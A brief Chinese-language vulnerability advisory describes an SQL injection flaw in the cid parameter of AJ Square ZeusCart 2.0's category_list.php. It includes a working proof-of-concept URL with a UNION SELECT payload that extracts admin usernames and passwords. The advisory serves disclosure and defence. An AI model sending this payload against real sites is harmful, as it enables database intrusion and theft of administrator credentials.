<p> 漏洞描述:Square ZeusCart是一款的为在线电子商务网站提供的购物车脚本程序。 AJ Square ZeusCart 2.0 及其早期版本的category_list.php中存在SQL注入漏洞。远程攻击者可以借助cid参数,执行任意SQL指令。</p><p>漏洞分析:</p><p>category_list.php文件中对cid变量没有进行有效过滤,允许远程攻击者直接对数据库进行操作,读取数据库中信息。</p><p> </p><p>验证方法<a href="http://site.com/category_list.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(user_name,char(58),password),2/**/FROM/**/admin/"><font color="#333333">:</font></a></p><p><a href="http://site.com/category_list.php?cid=-1/" rel="nofollow">http://site.com/category_list.php?cid=-1/</a>**/UNION/**/ALL/**/SELECT/**/CONCAT(user_name,char(58),password),2/**/FROM/**/admin/*</p>
暂无评论